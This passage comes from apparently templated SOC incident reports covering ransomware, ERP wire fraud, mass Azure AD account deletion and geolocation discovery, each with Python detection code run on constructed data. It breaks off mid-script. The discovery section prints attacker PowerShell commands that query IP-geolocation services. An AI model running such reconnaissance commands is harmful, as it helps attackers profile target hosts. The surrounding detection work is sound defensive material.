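    image: str                      # full path of the acting process
    op: str                         # "rename" or "create"
    path: str
    new_path: Optional[str] = None  # destination for renames


def build_sample_events():
    """Constructed sample: one encryptor plus two benign processes."""
    t0 = datetime(2024, 3, 13, 14, 10, 0)
    enc = r"C:\Windows\Temp\encryptor.exe"
    shares = [r"\\filesrv\finance", r"\\filesrv\hr", r"\\filesrv\r&d", r"\\filesrv\executive"]
    events = []
    for i in range(40):  # 40 renames in under five seconds, round-robin over the shares
        src = rf"{shares[i % 4]}\doc{i}.xlsx"
        events.append(FileEvent(t0 + timedelta(milliseconds=120 * i), 4789, enc,
                                "rename", src, src + ".encrypted"))
    for share in shares:  # one ransom note per share
        events.append(FileEvent(t0 + timedelta(seconds=6), 4789, enc,
                                "create", rf"{share}\README_ENCRYPTED.txt"))
    for i in range(200):  # benign: backup job creating .bak copies (creates, not renames)
        events.append(FileEvent(t0 + timedelta(milliseconds=50 * i), 1200,
                                r"C:\Program Files\Backup\backup.exe", "create",
                                rf"\\filesrv\backups\db{i}.bak"))
    for i in range(2):    # benign: sync client finalising two temp files
        events.append(FileEvent(t0 + timedelta(seconds=i), 2300,
                                r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
                                "rename", rf"C:\Users\alice\OneDrive\file{i}.tmp",
                                rf"C:\Users\alice\OneDrive\file{i}.docx"))
    return events


def ext(path):
    return ntpath.splitext(path)[1].lower()


def is_ransom_note(path):
    name = ntpath.basename(path).lower()
    return name.endswith(".txt") and any(k in name for k in ("readme", "decrypt", "recover", "how_to"))


def detect_mass_encryption(events, window=timedelta(seconds=60), min_renames=20, min_dirs=3):
    """Per process, count extension-changing renames in a sliding window; one
    new extension over many files in several directories is the encryption
    signature. Ransom notes and a Temp-resident image raise severity."""
    by_proc = defaultdict(list)
    for ev in events:
        by_proc[(ev.pid, ev.image)].append(ev)

    findings = []
    for (pid, image), evs in by_proc.items():
        evs.sort(key=lambda e: e.time)
        recent, note_dirs, best = deque(), set(), None
        for ev in evs:
            if ev.op == "create" and is_ransom_note(ev.path):
                note_dirs.add(ntpath.dirname(ev.path))
                continue
            if ev.op != "rename" or ext(ev.path) == ext(ev.new_path):
                continue
            recent.append(ev)
            while recent[0].time < ev.time - window:
                recent.popleft()
            top_ext, top_n = Counter(ext(e.new_path) for e in recent).most_common(1)[0]
            dirs = {ntpath.dirname(e.path) for e in recent if ext(e.new_path) == top_ext}
            if top_n >= min_renames and len(dirs) >= min_dirs:
                best = {"pid": pid, "image": image, "extension": top_ext,
                        "renames": top_n, "directories": len(dirs),
                        "window_end": ev.time.isoformat()}
        if best:
            best["ransom_notes"] = len(note_dirs)
            best["from_temp"] = "\\temp\\" in image.lower()
            best["severity"] = "critical" if best["ransom_notes"] or best["from_temp"] else "high"
            findings.append(best)
    return findings


if __name__ == "__main__":
    for finding in detect_mass_encryption(build_sample_events()):
        print(finding)
```

`ntpath` is used so the Windows UNC paths split correctly when the script runs on a Linux analysis box. At 12,847 files in five minutes the real encryptor crossed the 20-rename threshold within its first second; in production the action wired to this finding should be process kill plus host isolation, not just an alert.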
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed ransomware encryption |
| 2. Immediate Action | Isolate file server | CrowdStrike, Network ACLs | FILESRV-02 quarantined |
| 3. Process Termination | Kill encryptor.exe | CrowdStrike | Process terminated |
| 4. Account Remediation | Disable compromised admin account | Azure AD, AD | Admin account disabled; password reset |
| 5. Backup Restoration | Restore encrypted files from off-site backups | Veeam Backup | All files restored |
| 6. Incident Response | Activate disaster recovery | Management, Legal | Ransomware incident declared |
Jira Incident Report
**Ticket:** SOC-2024-212
**Summary:** T1486 – Ransomware Encrypts 12,847 Files on File Server
**Status:** RESOLVED
**Resolution:** MALICIOUS – Files Encrypted, Restored from Backups
**Priority:** P1 – CRITICAL
**Labels:** T1486, ransomware, data-encrypted, crowdstrike, compromised-admin
**Components:** Endpoint-Security, Backup-Recovery
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Ransomware Behavior Detected – Mass File Encryption”.
Host: FILESRV-02 (Primary File Server).
Process: C:\Windows\Temp\encryptor.exe.
Files: 12,847 files encrypted, 78 GB total.
Ransom Note: README_ENCRYPTED.txt.
Time: 2024-03-13 14:15 EST.
Technique: MITRE ATT&CK T1486 – Data Encrypted for Impact.
2. Technical Analysis:
Attack Chain:
13:30 – Domain admin account (jsmith) compromised via phishing
13:45 – Attacker logs into admin workstation via RDP
14:00 – Attacker uses PsExec to copy encryptor.exe to FILESRV-02
14:05 – encryptor.exe executed with SYSTEM privileges
14:10-14:15 – Mass encryption of files
14:15 – CrowdStrike detects
Ransomware Analysis:
Name: encryptor.exe (custom variant)
SHA256: a1b2c3d4…
Encryption: RSA-2048 as claimed in the ransom note (public key embedded); not verified by analysis. Asymmetric encryption of 78 GB in five minutes is not realistic, so a symmetric cipher with RSA-wrapped per-file keys is the likely scheme.
Extension: .encrypted
Ransom Note: README_ENCRYPTED.txt
Bitcoin Address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
Data Encrypted:
Finance: 3,456 files (financial records, reports)
HR: 2,891 files (employee records, payroll)
R&D: 4,234 files (source code, designs)
Executive: 1,234 files (board minutes, strategy)
Backups: 1,032 files (on-server backups)
Total: 12,847 files, 78 GB
Attacker Intent:
Financial gain via ransom
Business disruption
Data destruction if ransom not paid
3. Investigation Findings:
Timeline:
13:30 – Admin account compromised
13:45 – Attacker logs in
14:00 – Tool deployed
14:10-14:15 – Encryption
14:15 – Alert
14:17 – SOC investigates
14:18 – Host isolated
14:19 – Process terminated
14:20 – Admin account disabled
14:30 – Backup restoration begins
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\encryptor.exe (SHA256: a1b2c3d4…)
– README_ENCRYPTED.txt (multiple locations)
– *.encrypted files (12,847)
Network:
– Bitcoin wallet: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
– Email: decrypt@onionmail.org
Account:
– jsmith (compromised domain admin)
4. Containment Actions:
Immediate Actions:
Isolated FILESRV-02.
Terminated encryptor.exe.
Disabled compromised admin account.
Reset password.
Blocked outbound connections from the server.
Data Recovery:
Restored all 12,847 encrypted files from off-site Veeam backups (previous night).
Verified file integrity.
File server back online at 16:30.
Enterprise-wide Actions:
Scanned for other ransomware indicators (none found).
Reset all admin passwords.
Enforced MFA for all admins.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to file server.
Backups were available (off-site), preventing data loss.
6. Business Impact:
Operational Impact: File server offline for 2 hours.
Data Exposure: Data encrypted but restored; no permanent loss.
Financial Impact: No ransom paid; recovery costs.
7. Remediation & Prevention:
Completed Actions:
Ransomware stopped.
Files restored.
Admin account secured.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Implemented application control.
Enhanced backup frequency and testing.
8. Conclusion:
An attacker compromised a domain admin account and deployed ransomware on a file server, encrypting 12,847 files. CrowdStrike detected the ransomware behavior within minutes, enabling isolation and restoration from backups. No ransom was paid, and no data was permanently lost.
Closure Rationale: Files encrypted; files restored from backups; admin account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-13 15:30 EST
173. T1657 – Financial Theft (Application Logs Detection)
Application Log Alert Details
* **Alert ID:** ERP-FRAUD-1657-7842
* **Alert Time:** 2024-03-13 11:30:22 EST
* **Severity:** CRITICAL (99/100)
* **Source:** SAP ERP Application Logs + Splunk SIEM
* **Rule:** “Unauthorized Wire Transfer Initiated”
* **MITRE ATT&CK:** T1657 – Financial Theft
Alert Details:
Detection: Wire transfer request from unauthorized IP with compromised credentials
* **Application:** SAP ERP (Financial Module)
* **User:** jwilson@company.com (John Wilson, Accounts Payable Manager)
* **Action:** Initiate wire transfer
* **Amount:** $847,000.00
* **Recipient Account:** Bank of Cyprus, Account # 1234-5678-9012-3456
* **Recipient Name:** “Cyprus Consulting Ltd”
* **Time:** 11:25 EST
* **Source IP:** 185.143.221[.]89 (Bulgaria)
Anomaly Detection:
User jwilson normally initiates wire transfers from US IPs only
This is the first wire transfer from Bulgaria
Amount is unusually high for this user (normal average: $25,000)
Recipient account not in approved vendor list
Transfer bypassed dual approval (normally requires two approvers)
Application Logs:
11:20:15 – Login to SAP from 185.143.221[.]89 (success)
11:21:30 – Navigated to “Payment Run” transaction
11:22:45 – Created new vendor “Cyprus Consulting Ltd”
11:23:30 – Entered bank account details
11:24:15 – Initiated wire transfer for $847,000
11:25:00 – System generated transfer request
11:25:30 – Splunk alert triggered (correlation rule)
Additional Context:
User jwilson reported a suspicious email at 10:00; whether the link was clicked is still under investigation.
MFA on SAP account: not enabled (now enforced).
Dual approval was bypassed via the “emergency override” feature (abused).
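The anomaly checks the correlation rule keyed on, written out as a scoring function. This is an added example, not SAP's or Splunk's logic. jwilson's twelve baseline transfers, the approved-vendor list and the weights are constructed assumptions; the fraudulent transaction carries the amount, source country, vendor-creation timing and override flag from the alert, and a benign transfer by the same user shows the score staying at zero.

```python
"""Score a payment run against the initiating user's own history (T1657).

Added example for this report, not SAP's or Splunk's logic. Baseline
transfers, the vendor list and the weights are constructed assumptions.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class Transfer:
    time: datetime
    user: str
    amount: float
    country: str                        # geolocation of the SAP session's source IP
    vendor: str
    vendor_created: Optional[datetime]  # when the vendor master record was created
    approvers: int                      # approvals recorded before release
    override: bool                      # "emergency override" used to skip dual approval


APPROVED_VENDORS = {"Acme Office Supply", "Northwind Logistics", "Contoso Cloud"}

# jwilson's constructed baseline: US-only, approved vendors, $25,000 average.
HISTORY = [
    Transfer(datetime(2024, 2, 1, 10, 0) + timedelta(days=7 * i), "jwilson", amt, "US",
             vendor, None, 2, False)
    for i, (amt, vendor) in enumerate([
        (22000, "Acme Office Supply"), (27500, "Northwind Logistics"), (19800, "Contoso Cloud"),
        (31000, "Acme Office Supply"), (24000, "Northwind Logistics"), (26500, "Contoso Cloud"),
        (21000, "Acme Office Supply"), (28000, "Northwind Logistics"), (23500, "Contoso Cloud"),
        (25700, "Acme Office Supply"), (30000, "Northwind Logistics"), (21000, "Contoso Cloud"),
    ])
]

# The transaction from the alert, and a normal one by the same user for contrast.
FRAUD = Transfer(datetime(2024, 3, 13, 11, 24, 15), "jwilson", 847000.0, "BG",
                 "Cyprus Consulting Ltd", datetime(2024, 3, 13, 11, 22, 45), 0, True)
BENIGN = Transfer(datetime(2024, 3, 13, 15, 0), "jwilson", 27000.0, "US",
                  "Northwind Logistics", datetime(2021, 6, 1), 2, False)


def score_transfer(tx, history, approved=APPROVED_VENDORS, ratio_limit=3.0,
                   large_amount=50000, new_vendor_age=timedelta(days=1)):
    """Return a 0-100 risk score and the reasons; each check is one of the
    anomalies listed in the alert."""
    own = [h for h in history if h.user == tx.user]
    reasons, score = [], 0

    if own:
        avg = sum(h.amount for h in own) / len(own)
        if tx.amount > ratio_limit * avg:
            score += 30
            reasons.append(f"amount {tx.amount / avg:.1f}x user average (${avg:,.0f})")
        if tx.country not in {h.country for h in own}:
            score += 25
            reasons.append(f"first transfer initiated from {tx.country}")
    if tx.vendor not in approved:
        score += 20
        reasons.append("recipient not on approved vendor list")
    if tx.vendor_created and tx.time - tx.vendor_created < new_vendor_age:
        score += 15
        minutes = (tx.time - tx.vendor_created).total_seconds() / 60
        reasons.append(f"vendor record created {minutes:.0f} min before payment")
    if tx.override or tx.approvers < 2:
        score += 30
        reasons.append("dual approval bypassed" + (" (emergency override)" if tx.override else ""))
    if tx.amount >= large_amount:
        score += 10
        reasons.append(f"amount at or above ${large_amount:,} review threshold")

    score = min(score, 100)
    verdict = "block" if score >= 70 else "review" if score >= 40 else "allow"
    return {"user": tx.user, "amount": tx.amount, "score": score,
            "verdict": verdict, "reasons": reasons}


if __name__ == "__main__":
    print(score_transfer(FRAUD, HISTORY))
    print(score_transfer(BENIGN, HISTORY))
```

The override check carries the same weight as the amount anomaly on purpose: a transfer released with fewer than two approvals is a control failure regardless of size, which is why the remediation below removes the override path rather than tuning a threshold.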
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Splunk alert | Splunk ES, SAP Logs | Confirmed unauthorized wire transfer |
| 2. User Contact | Call jwilson immediately | Phone | User did NOT initiate transfer (account compromised) |
| 3. Immediate Action | Cancel wire transfer | SAP Admin, Bank Contact | Wire transfer cancelled (funds not sent) |
| 4. Account Remediation | Disable jwilson account | Azure AD, AD | Account disabled; password reset |
| 5. Vendor Removal | Delete fraudulent vendor “Cyprus Consulting Ltd” | SAP Admin | Vendor removed |
| 6. Incident Response | Activate financial fraud response | Legal, Finance, Management | Fraud attempt documented |
Jira Incident Report
**Ticket:** SOC-2024-213
**Summary:** T1657 – Financial Theft Attempt: $847,000 Wire Transfer
**Status:** RESOLVED
**Resolution:** MALICIOUS – Fraud Attempt Prevented
**Priority:** P1 – CRITICAL
**Labels:** T1657, financial-theft, wire-fraud, sap, compromised-account
**Components:** Financial-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: SAP ERP Application Logs + Splunk SIEM.
Alert: “Unauthorized Wire Transfer Initiated”.
User: jwilson@company.com (Accounts Payable Manager).
Action: $847,000 wire transfer to fraudulent vendor.
Time: 2024-03-13 11:30 EST.
Technique: MITRE ATT&CK T1657 – Financial Theft.
2. Technical Analysis:
Attack Chain:
10:30 – jwilson account compromised via phishing (credential harvesting)
10:45 – Attacker logs into SAP from Bulgaria IP
11:00 – Attacker enumerates financial modules
11:20-11:25 – Fraudulent wire transfer creation
11:25 – Splunk alert triggers
11:26 – SOC investigates
Fraud Details:
Amount: $847,000
Recipient: Cyprus Consulting Ltd (fraudulent vendor)
Bank: Bank of Cyprus, Account # 1234-5678-9012-3456
Bypass: Attacker used “emergency override” feature (normally requires two approvers)
SAP Activity:
Created new vendor (not in approved list)
Initiated wire transfer with high amount
Overrode dual approval requirement (abused emergency procedure)
User Status:
Account compromised; user unaware
No MFA on SAP account
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
11:20-11:25 – Fraudulent transfer
11:25 – Alert
11:26 – SOC investigates
11:27 – User contacted
11:28 – Wire transfer cancelled
11:29 – Account disabled
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Account:
– jwilson (compromised)
Vendor:
– Cyprus Consulting Ltd (fraudulent)
– Bank Account: 1234-5678-9012-3456
4. Containment Actions:
Immediate Actions:
Contacted bank to cancel wire transfer (successful – funds not sent).
Disabled jwilson account.
Reset password.
Removed fraudulent vendor from SAP.
Blocked attacker IP.
Financial Security:
Reviewed all recent wire transfers (none other suspicious).
Enhanced dual approval requirements (removed emergency override).
Account Remediation:
Enforced MFA for all SAP users.
Conducted security awareness training for finance team.
5. Root Cause Analysis:
Primary Cause: User account compromised via phishing.
Contributing Factors:
No MFA on SAP account.
Emergency override feature abused.
No geofencing for SAP access.
6. Business Impact:
Financial Impact: $847,000 at risk; prevented.
Operational Impact: Finance processes delayed for review.
Reputational Impact: None (prevented).
7. Remediation & Prevention:
Completed Actions:
Fraudulent transfer cancelled.
Account secured.
Vendor removed.
Technical Controls Enhanced:
Enforced MFA for all SAP users.
Implemented geofencing (block access from high-risk countries).
Removed the emergency override; any remaining override path now requires a second approver.
Enhanced monitoring for wire transfers over $50,000.
8. Conclusion:
An attacker compromised an accounts payable manager’s SAP account and attempted to initiate an $847,000 wire transfer to a fraudulent vendor. Splunk detected the anomalous transaction and enabled immediate cancellation. No funds were lost.
Closure Rationale: Fraud prevented; account secured; controls enhanced.
Analyst: [Your Name], SOC Analyst Date: 2024-03-13 12:30 EST
174. T1531 – Account Access Removal (Azure AD Detection)
Azure AD Alert Details
* **Alert ID:** AAD-ACCT-REMOVAL-1531-7842
* **Alert Time:** 2024-03-13 16:30:45 EST
* **Severity:** CRITICAL (98/100)
* **Source:** Azure AD Identity Protection + Audit Logs
* **Rule:** “Mass Account Deletion Detected”
* **MITRE ATT&CK:** T1531 – Account Access Removal
Alert Details:
Detection: Bulk deletion of user accounts in Azure AD
* **Time:** 16:15-16:30 EST
* **Action Performed By:** bjones@company.com (Global Administrator) – compromised
* **Source IP:** 185.143.221[.]89 (Bulgaria)
Audit Events:
16:15:22 – Delete user: jsmith@company.com (IT Admin)
16:15:45 – Delete user: kwilson@company.com (Finance Manager)
16:16:12 – Delete user: alexchen@company.com (Engineer)
16:16:38 – Delete user: rpatel@company.com (Engineer)
16:17:05 – Delete user: mwilson@company.com (Sales Rep)
16:17:33 – Delete user: cjohnson@company.com (CEO)
16:18:01 – Delete user: bturner@company.com (Accountant)
… (continuing)
Total Accounts Deleted: 87 users (from all departments)
23 from Finance
18 from Engineering
15 from Marketing
12 from Sales
10 from HR
9 from Executive (including CEO, CFO, CTO)
Additional Actions:
16:20:15 – Deleted 5 guest users
16:22:30 – Removed all users from “Domain Admins” group (emptied)
16:25:45 – Changed password policies to lock all remaining users
Detection Logic:
87 accounts deleted in 15 minutes (highly anomalous)
Actions from unusual location (Bulgaria)
Performed by Global Admin bjones (who was on vacation)
Pattern matches account access removal (sabotage)
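An added example, not Microsoft's detection, that triages a constructed audit-log export for this pattern and derives the restore list the recovery steps need. The records follow the general shape of Microsoft Graph `directoryAudit` entries (`activityDateTime`, `activityDisplayName`, `initiatedBy`, `targetResources`) but are not a real export; the `member` field on the group-removal record is a simplification, and the group name “Domain Admins” follows this report rather than an Entra ID tenant. The routine HR offboarding at the start is there to show a single deletion does not fire.

```python
"""Triage an Entra ID (Azure AD) audit-log export for mass account removal
(T1531) and derive the restore list. Added example; the records are
constructed in the general shape of Microsoft Graph directoryAudit entries."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

DESTRUCTIVE = {"Delete user", "Remove member from group", "Update policy", "Disable account"}


def _rec(ts, activity, upn, ip, target_id, target_name, extra=None):
    r = {"activityDateTime": ts, "activityDisplayName": activity,
         "initiatedBy": {"user": {"userPrincipalName": upn, "ipAddress": ip}},
         "targetResources": [{"id": target_id, "displayName": target_name}]}
    if extra:
        r["targetResources"][0].update(extra)
    return r


def build_sample_audit():
    """Constructed export: one routine offboarding by HR, then the attacker's
    run of deletions, group removals and a policy change (times in UTC)."""
    actor, ip = "bjones@company.com", "185.143.221.89"
    recs = [_rec("2024-03-13T13:02:10Z", "Delete user", "hr-admin@company.com",
                 "203.0.113.10", "0000-aaaa", "leaver@company.com")]
    t0 = datetime(2024, 3, 13, 21, 15, 22)  # 16:15:22 EST
    for i, name in enumerate(["jsmith", "kwilson", "alexchen", "rpatel", "mwilson", "cjohnson", "bturner"]):
        ts = (t0 + timedelta(seconds=25 * i)).strftime("%Y-%m-%dT%H:%M:%SZ")
        recs.append(_rec(ts, "Delete user", actor, ip, f"1111-{i:04d}", f"{name}@company.com"))
    for member in ("da-alice", "da-bob"):  # 'member' is a simplification of the real schema
        recs.append(_rec("2024-03-13T21:22:30Z", "Remove member from group", actor, ip,
                         "2222-0001", "Domain Admins", {"member": member}))
    recs.append(_rec("2024-03-13T21:25:45Z", "Update policy", actor, ip, "3333-0001",
                     "Default password policy", {"modifiedProperties": [
                         {"displayName": "LockoutThreshold", "oldValue": "10", "newValue": "1"}]}))
    return json.dumps(recs)


def parse_audit(text):
    events = [{"time": datetime.strptime(r["activityDateTime"], "%Y-%m-%dT%H:%M:%SZ"),
               "activity": r["activityDisplayName"],
               "actor": r["initiatedBy"]["user"]["userPrincipalName"],
               "ip": r["initiatedBy"]["user"].get("ipAddress"),
               "target": r["targetResources"][0]} for r in json.loads(text)]
    return sorted(events, key=lambda e: e["time"])


def find_mass_removal(events, window=timedelta(minutes=15), threshold=5):
    """Flag an actor whose destructive directory changes reach `threshold`
    inside any `window`; a single offboarding deletion stays below it."""
    by_actor = defaultdict(list)
    for e in events:
        if e["activity"] in DESTRUCTIVE:
            by_actor[e["actor"]].append(e)
    findings = []
    for actor, evs in by_actor.items():
        start, peak = 0, 0
        for j, e in enumerate(evs):
            while evs[start]["time"] < e["time"] - window:
                start += 1
            peak = max(peak, j - start + 1)
        if peak >= threshold:
            findings.append({"actor": actor, "ips": sorted({e["ip"] for e in evs}),
                             "events_in_window": peak,
                             "deleted_users": sum(e["activity"] == "Delete user" for e in evs)})
    return findings


def build_recovery_plan(events, actor):
    """Order the actor's destructive events into restore steps. Deleted users
    sit in the 30-day soft-delete container and are restored by object id
    (Microsoft Graph: POST /directory/deletedItems/{id}/restore)."""
    plan = {"restore_users": [], "readd_members": defaultdict(list), "revert_policies": []}
    for e in (e for e in events if e["actor"] == actor):
        t = e["target"]
        if e["activity"] == "Delete user":
            plan["restore_users"].append(t["id"])
        elif e["activity"] == "Remove member from group":
            plan["readd_members"][t["displayName"]].append(t["member"])
        elif e["activity"] == "Update policy":
            for p in t.get("modifiedProperties", []):
                plan["revert_policies"].append((t["displayName"], p["displayName"], p["oldValue"]))
    plan["readd_members"] = dict(plan["readd_members"])
    return plan


if __name__ == "__main__":
    evs = parse_audit(build_sample_audit())
    for finding in find_mass_removal(evs):
        print(finding)
        print(build_recovery_plan(evs, finding["actor"]))
```

The recovery plan is built from the audit trail rather than from memory because the same trail also records what the attacker changed that nobody noticed in the moment (here the lockout threshold); restoring accounts without reverting that policy would have re-locked them on the first mistyped password.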
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Azure AD audit logs | Azure AD Portal | Confirmed mass account deletion |
| 2. User Verification | Contact bjones | Phone, Teams | bjones on vacation; did NOT perform actions |
| 3. Immediate Action | Disable compromised bjones account | Azure AD, AD | bjones account disabled |
| 4. Account Restoration | Recover deleted accounts | Azure AD PowerShell, Recycle Bin | 87 accounts restored (from recycle bin) |
| 5. Group Restoration | Restore Domain Admins group membership | AD | Domain Admins group restored |
| 6. Password Policy | Revert password policy changes | Azure AD | Policies restored |
| 7. Incident Response | Activate breach response | Management, Legal | Account sabotage incident declared |
Jira Incident Report
**Ticket:** SOC-2024-214
**Summary:** T1531 – Mass Account Deletion (87 Users) by Compromised Global Admin
**Status:** RESOLVED
**Resolution:** MALICIOUS – Accounts Restored
**Priority:** P1 – CRITICAL
**Labels:** T1531, account-access-removal, azure-ad, compromised-admin
**Components:** Identity-Management, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Azure AD Identity Protection + Audit Logs.
Alert: “Mass Account Deletion Detected”.
Action: 87 user accounts deleted, Domain Admins group emptied, password policies changed.
Performed By: bjones@company.com (Global Administrator) – compromised.
Source IP: 185.143.221[.]89 (Bulgaria).
Time: 2024-03-13 16:30 EST.
Technique: MITRE ATT&CK T1531 – Account Access Removal.
2. Technical Analysis:
Attack Chain:
15:30 – bjones credentials compromised via phishing
15:45 – Attacker logs into Azure AD portal from Bulgaria IP
16:00 – Attacker enumerates users, identifies targets
16:15-16:30 – Mass account deletion
16:20 – Domain Admins group emptied
16:25 – Password policies changed (lockout)
16:30 – Azure AD alerts
Accounts Deleted (87):
Finance (23)
Engineering (18)
Marketing (15)
Sales (12)
HR (10)
Executive (9) – CEO, CFO, CTO, etc.
Group Changes:
Domain Admins group emptied (12 members removed)
Effect: No domain administrators
Password Policy Changes:
Account lockout threshold set to 1 (any failed login locks account)
Lockout duration set to 999 minutes
Attacker Intent:
Complete denial of access to organization
Chaos and disruption
Potential precursor to ransomware
Compromised Admin:
bjones (Global Admin) on leave, unaware
No MFA on account (now enforced)
3. Investigation Findings:
Timeline:
15:30 – Admin account compromised
15:45 – Attacker logs in
16:15-16:30 – Account deletion
16:30 – Alert triggers
16:32 – SOC investigates
16:33 – bjones account disabled
16:35 – Account recovery begins
16:45 – All 87 accounts restored
16:50 – Domain Admins group restored
16:55 – Password policies reverted
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Account:
– bjones (compromised global admin)
Actions:
– 87 user accounts deleted (list attached)
– Domain Admins group emptied
– Password policy changed
4. Containment Actions:
Immediate Actions:
Disabled compromised bjones account.
Restored all 87 deleted accounts from Azure AD Recycle Bin.
Restored Domain Admins group membership.
Reverted password policy changes.
Reset bjones password.
Enforced MFA for all admins.
Blocked attacker IP.
User Communication:
Notified all affected users (accounts were deleted for 15-30 minutes).
Verified no data loss.
Account Remediation:
Reset passwords for all 87 affected users (precaution).
5. Root Cause Analysis:
Primary Cause: Global admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin account had excessive privileges.
No alerts for mass account deletion.
6. Business Impact:
Operational Impact: 87 users locked out for 15-30 minutes.
Data Exposure: None (accounts deleted, no data access).
Reputational Impact: Internal disruption.
7. Remediation & Prevention:
Completed Actions:
Accounts restored.
Admin account secured.
MFA enforced.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Implemented Privileged Identity Management (JIT access).
Created alert for mass account deletion.
Added IP restrictions for admin portal access.
8. Conclusion:
An attacker compromised a global admin account and deleted 87 user accounts, emptied the Domain Admins group, and changed password policies to lock out remaining users. Azure AD detected the mass changes, enabling rapid restoration. All accounts were restored within 30 minutes.
Closure Rationale: Accounts restored; admin account secured; controls enhanced.
Analyst: [Your Name], SOC Analyst Date: 2024-03-13 17:30 EST
175. T1614 – System Location Discovery (CrowdStrike Detection)
CrowdStrike Alert Details
* **Alert ID:** CS-LOC-DISCOVERY-1614-7842
* **Alert Time:** 2024-03-13 10:30:22 EST
* **Severity:** MEDIUM (72/100)
* **Source:** CrowdStrike Falcon EDR
* **Rule:** “System Location Discovery – Geolocation API Calls”
* **MITRE ATT&CK:** T1614 – System Location Discovery
Alert Details:
Detection: Process making external API calls to determine system geolocation
* **Host:** DEV-WS-089 (Development Workstation)
* **User:** alexchen@company.com (Alex Chen, Engineer)
* **Time:** 10:25 EST
Process Tree:

```text
explorer.exe (PID: 2341)
└─ powershell.exe (PID: 4789)
   Command: powershell -Command "(Invoke-WebRequest -Uri 'http://ip-api.com/json').Content | ConvertFrom-Json | Select country, city, lat, lon"
   Command: powershell -Command "(Invoke-WebRequest -Uri 'http://api.ipify.org').Content"
   Command: powershell -Command "(Invoke-WebRequest -Uri 'http://ipinfo.io/json').Content"
```

Network Connections:

```text
10:25:10 – GET http://ip-api.com/json (response: {"country":"United States","city":"New York","lat":40.7128,"lon":-74.0060})
10:25:15 – GET http://api.ipify.org (response: "192.0.2.123")
10:25:20 – GET http://ipinfo.io/json (response: {"ip":"192.0.2.123","country":"US","city":"New York"})
```
Detection Logic:
PowerShell making multiple geolocation API calls (unusual)
User alexchen has no legitimate need for this
Commands used to determine country/city
Pattern matches adversary checking if they are in target geography
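An added example (not CrowdStrike's rule) that scores IP/geolocation lookups by process ancestry. The process records and the lookup-host list are constructed assumptions. It shows why the process tree is the deciding factor: the same `Invoke-WebRequest` to a geolocation service is high severity when the PowerShell process descends from an Office application (the macro case investigated below) and only medium when typed into a shell under explorer.exe, where an administrator checking the egress IP is a plausible explanation.

```python
"""Score IP/geolocation lookups by process ancestry (T1614).

Added example for this report, not CrowdStrike's rule. Process records and
the lookup-host list are constructed assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Public-IP / geolocation services droppers query before deciding whether to
# run (assumed starter list; extend from proxy logs).
GEO_HOSTS = re.compile(
    r"\b(ip-api\.com|ipinfo\.io|api\.ipify\.org|ifconfig\.me|ipapi\.co|geolocation-db\.com)\b", re.I)
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def build_sample_processes():
    """Constructed process snapshot: a macro-spawned lookup, the same lookup
    from an interactive shell, and an Office child that does no lookup."""
    ps_geo = ('powershell -Command "(Invoke-WebRequest -Uri \'http://ip-api.com/json\').Content'
              ' | ConvertFrom-Json | Select country, city"')
    return [
        Proc(2341, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
        Proc(5120, 2341, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
             'WINWORD.EXE /n "Document.docm"'),
        Proc(4789, 5120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ps_geo),
        Proc(6001, 2341, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
             'powershell -Command "(Invoke-WebRequest -Uri \'http://api.ipify.org\').Content"'),
        Proc(6100, 5120, r"C:\Program Files\Adobe\Acrobat\Acrobat.exe", "Acrobat.exe"),
    ]


def ancestors(proc, by_pid):
    """Yield the parent chain, stopping on a missing parent or a pid cycle."""
    seen, cur = set(), by_pid.get(proc.ppid)
    while cur and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def score_geolocation_lookups(procs):
    """One finding per process whose command line names a lookup host; the
    severity comes from what spawned it, not from the command alone."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        m = GEO_HOSTS.search(p.cmdline)
        if not m:
            continue
        image = p.image.rsplit("\\", 1)[-1].lower()
        chain = [a.image.rsplit("\\", 1)[-1].lower() for a in ancestors(p, by_pid)]
        office_parent = any(a in OFFICE_IMAGES for a in chain)
        if office_parent and image in SHELLS:
            sev = "high"     # scripting host under Office phoning a geo service
        elif image in SHELLS:
            sev = "medium"   # a shell doing the lookup; could be an admin, needs context
        else:
            sev = "low"
        findings.append({"pid": p.pid, "image": image, "host": m.group(1).lower(),
                         "ancestry": chain, "office_parent": office_parent, "severity": sev})
    return findings


if __name__ == "__main__":
    for finding in score_geolocation_lookups(build_sample_processes()):
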